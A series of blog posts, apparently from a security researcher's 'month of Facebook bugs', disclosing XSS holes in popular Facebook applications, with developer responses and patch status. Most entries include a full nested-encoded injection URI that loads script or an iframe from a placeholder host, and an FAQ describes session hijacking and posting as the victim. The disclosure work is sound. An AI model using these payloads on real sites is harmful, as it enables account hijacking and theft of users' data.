FAXX Hack: Birthday Cards

Current Monthly Active Users: 9,067,238

Current Rank on Application Leaderboard: 18

Application Developer: RockYou

Responsiveness: Once again, RockYou never sent a message but did patch the hole.

Vulnerability Status: Patched

Capable of Clickjacking Install: No

Example URI: http://apps.facebook.com/rybirthday/zoo/shop.php?category=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http://fb.rockyou.com/facebook_apps/rybirthdays/zoo/shop.php?category=%2522%252F%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E%22%3E


FAXX Hack: Bumper Sticker

Double hacks tomorrow to make up for Monday’s break.

Facebook Verified Application

Current Monthly Active Users: 5,422,286

Current Rank on Application Leaderboard: 29

Application Developer: LinkedIn

Responsiveness: I sent this hole to Facebook on Sep. 1, then followed up with an e-mail to LinkedIn over the weekend.

Vulnerability Status: Unpatched

Capable of Clickjacking Install: No

Example URI: After further consideration, I’ve changed my mind about the whole 24-hour thing. I’ll post details once the hole is patched.


Quick Update on FAXX Hacks

I did not post a FAXX hack on Monday for two reasons. First, I had forgotten to factor in the long weekend (Monday is Labor Day in the US) when notifying developers, hence posting would not have allowed an actual business day to pass before releasing details. Second, I spent most all of Saturday and again Monday in bed. I haven’t been terribly sick, but I’ve been dealing with tiredness and weakness.

None of this means I’ve hit a point where I lack for material. To make up for Monday’s omission, I will be posting two hacks one day this week. I may take another break on Tuesday to ensure developers have time to patch holes, but if that happens, I’ll simply post two hacks on a second day as well. The “month of Facebook bugs” is far from over.


FAXX Hack: RockYou Live

Facebook Verified Application

Current Monthly Active Users: 9,767,698

Current Rank on Application Leaderboard: 17

Application Developer: RockYou!

Responsiveness: After announcing this series, a Facebook security contact got in touch and requested more information. I complied, and apparently RockYou! issued a patch after receiving word from Facebook, as I’ve not heard from them but can no longer replicate the issue.

Vulnerability Status: Patched

Capable of Clickjacking Install: No

Example URI: http://apps.facebook.com/superwall/stickers_mainpage.php?type=cards&_ryfbe=fb-wall-header-stickers&msg=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffb.rockyou.com%2Ffacebook_apps%2Frywall%2Fstickers_mainpage.php%3Ftype%3Dcards%26_ryfbe%3Dfb-wall-header-stickers%26msg%3D%2522%2522%253E%253Cscript%2Bsrc%253D%2522http%253A%252F%252FEVILURI%2522%253E%253C%252Fscript%253E

Notes: When I first figured out how to take advantage of XSS holes in FBML applications, I tried inserting a script element, as shown here. This worked with RockYou Live, but later applications included scripts prior to the insertion point. When taken out of the context of apps.facebook.com, these scripts would generate errors, and the inserted script would fail to execute. I then resorted to inserting another iframe which loaded a special HTML file that included the necessary script payload. Previous FAXX examples use this more reliable trick.

By the way, RockYou Live was also among the worst performers in my privacy policy survey a few weeks back.


FAXX Hack: Farm Town

Current Monthly Active Users: 18,638,429

Current Rank on Application Leaderboard: 7

Application Developer: Slashkey

Responsiveness: Slashkey reported that they went through their codebase and encoded all URI parameters after receiving word of the problem.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/farmtown/select_friends/?type=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%253A%252F%252Fl1.slashkey.com%252Ffacebook%252Ffarm%252Fselect_friends%252F%253Ftype%253D%252522%25252F%25253E%25253Ciframe%252Bsrc%25253D%252522http%25253A%25252F%25252FEVILURI%25252F%252522%25253E%2526select%253Dfarm%22%2F%3E&select=farm
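As an added example (not code from the page, RockYou or Slashkey), the Python below peels the nested URL encoding off the Farm Town example URI above, showing how many decode hops the parameter is built for, and then renders a hypothetical fb:iframe template both without output encoding (the pattern behind these holes) and with the parameter encoding Slashkey described; the template host name is a stand-in.

```python
import html
from urllib.parse import parse_qs, quote, unquote_plus, urlsplit

# Farm Town example URI quoted from the page (EVILURI is the page's own placeholder).
FARM_TOWN_URI = (
    "http://apps.facebook.com/farmtown/select_friends/?type=%22%2F%3E%3Cfb%3Aiframe+src%3D"
    "%22http%253A%252F%252Fl1.slashkey.com%252Ffacebook%252Ffarm%252Fselect_friends%252F"
    "%253Ftype%253D%252522%25252F%25253E%25253Ciframe%252Bsrc%25253D%252522http%25253A"
    "%25252F%25252FEVILURI%25252F%252522%25253E%2526select%253Dfarm%22%2F%3E&select=farm"
)

def decode_layers(uri, name, limit=8):
    """Successive decodings of query parameter `name`, outermost first.
    layers[0] is what the first server sees after one URL decode (as parse_qs does);
    each later layer is what the next hop sees after decoding once more. The list
    stops when another decode no longer changes the value."""
    layers = [parse_qs(urlsplit(uri).query)[name][0]]
    for _ in range(limit):
        nxt = unquote_plus(layers[-1])
        if nxt == layers[-1]:
            break
        layers.append(nxt)
    return layers

# Hypothetical FBML template in the shape of the vulnerable pages: the parameter is
# reflected into an fb:iframe src attribute. The host name is a stand-in.
TEMPLATE = '<fb:iframe src="http://app.example.invalid/select_friends/?type=%s"/>'

def render_unencoded(value):
    """The FAXX pattern: a value beginning with "/> closes the attribute and the tag."""
    return TEMPLATE % value

def render_encoded(value):
    """The fix Slashkey described, encoding parameters before output: percent-encode
    for the URL context, then attribute-escape for the surrounding HTML context."""
    return TEMPLATE % html.escape(quote(value, safe=""), quote=True)

def tag_count(markup):
    """Crude structural check: a correctly rendered template contains exactly one tag."""
    return markup.count("<")

if __name__ == "__main__":
    layers = decode_layers(FARM_TOWN_URI, "type")
    for depth, layer in enumerate(layers):
        print(f"layer {depth}: {layer}")
    print("tags, unencoded:", tag_count(render_unencoded(layers[0])))
    print("tags, encoded:  ", tag_count(render_encoded(layers[0])))
```

The three layers correspond to the three decodes the payload must survive (apps.facebook.com, the developer's server, and the injected iframe's own query string); percent-encoding at output leaves the reflected value as inert attribute text.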


FAXX Hack: Movies (Flixster)

Facebook Verified Application

Current Monthly Active Users: 19,392,931

Current Rank on Application Leaderboard: 6

Application Developer: Flixster

Responsiveness: As of Sep. 4, the hole remains and I’ve had no word from Flixster. Update: I received an e-mail from Flixster this evening confirming a fix.

Vulnerability Status: Patched (originally posted as Unpatched)

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/flixster/auth/account-merge?from=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Fbk.flixster.com%2Ffacebook%2Fauth%2Faccount-merge%3Ffrom%3D%2522%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E%22%3E


FAXX Hack: LivingSocial

I originally planned on posting a different application today, but since that hole remains unpatched, I decided to wait another day and simply move down the leaderboard with a vulnerability I found yesterday.

Facebook Verified Application

Current Monthly Active Users: 23,688,212

Current Rank on Application Leaderboard: 3

Application Developer: LivingSocial

Responsiveness: LivingSocial responded within half an hour to let me know the hole was patched.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: hxxp://apps.facebook.com/livingsocial/micro/ad_manager/t/frame?campaign=%22)%3B%3C%2Fscript%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffacebook.livingsocial.com%2Fmicro%2Fad_manager%2Ft%2Fframe%3Fcampaign%3D%2522)%253B%253C%252Fscript%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252EVILURI%252F%2522%253E%253Cscript%253Ex%253D(%2522%22%3E%3Cscript%3Ex%3D(%22

Notes: This example serves as a reminder to leave no page unexamined when looking for vulnerabilities. The hijacked page is normally used in an iframe for serving ads within the application, but since it resides at the same location as the application itself, it can be accessed via apps.facebook.com to launch an attack.


FAQs on FAXX and the “Month of Facebook Bugs”

Isn’t this just a month of Facebook Application Bugs? Not exactly. While each of the vulnerabilities occurs in a Facebook application, an attacker can exploit each one in powerful ways and gain access to many Facebook features. Also, such attacks are made possible by the very structure of the Facebook Platform – the fact that any of these application holes allows the same type of attack demonstrates that the problem goes beyond specific applications.

As long as the Platform remains in its current configuration, application-based attacks (FAXX = Facebook Application XSS/XSRF) will continue to be possible. I can ensure that 30 popular applications are patched, but if a 31st remains open, users are still vulnerable. If Facebook allows third-party applications to operate on their service, they cannot simply relegate security and privacy responsibilities to application developers.

These are all just XSS holes. What sort of attacks are possible with them? Each XSS hole lets an attacker hijack the session credentials of the current user, provided they’re logged into the application. With those credentials, one can execute any Facebook API request that the application can make during the user’s session.

By default, this includes accessing a user’s full profile information, accessing the profile information of friends, accessing photos of a user or their friends, sending notifications to friends (with links), and posting feed stories on a user’s wall (with links). Notifications and feed stories would appear to come from the hijacked application. Some applications have extended permissions which can be exploited, such as updating a user’s status or publishing to their stream.

Finally, many applications allow for clickjacking installs, which means that users who have not already authorized the application (or who have opted out of the Platform altogether) are still vulnerable to an attack. I plan on releasing full source code demonstrating these attack vectors once the series comes to a close.

But the applications you do publish will be secure once they’re patched, right? Each time I evaluate an application, my goal is simply to find a hole. Once I’ve found one, I report it and move on to another application. Every application listed here could easily have other vulnerabilities that I have not yet found.

Will this really last an entire month? When I began this project, I had six holes ready to post. Since starting the series two days ago, I’ve added two more to my list. I started by focusing on the most popular applications, meaning hundreds if not thousands have yet to be tested. Based on my experiences so far, I’m fairly confident that I will find 30 vulnerabilities by the time September finishes.
